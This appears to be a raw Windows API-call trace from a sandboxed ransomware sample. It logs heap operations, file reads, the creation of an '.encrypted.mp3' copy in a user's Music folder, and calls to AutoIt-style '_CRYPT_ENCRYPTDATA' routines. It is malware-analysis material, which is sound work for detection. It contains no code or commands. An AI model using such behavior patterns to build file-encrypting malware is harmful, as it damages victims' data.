hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.651] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni")) returned 0x10 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\q_z7.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.652] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0037.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0037.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0037.653] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.653] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0037.655] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x836a, lpOverlapped=0x0) returned 1 [0037.656] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1836a) returned 0xac0018 [0037.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0037.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1836a) returned 0x935008 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1836a) returned 0xac0018 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0037.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.660] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1836a) returned 0xac0018 [0037.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1836a) returned 0x94d380 [0037.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.663] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da298 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.664] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.664] 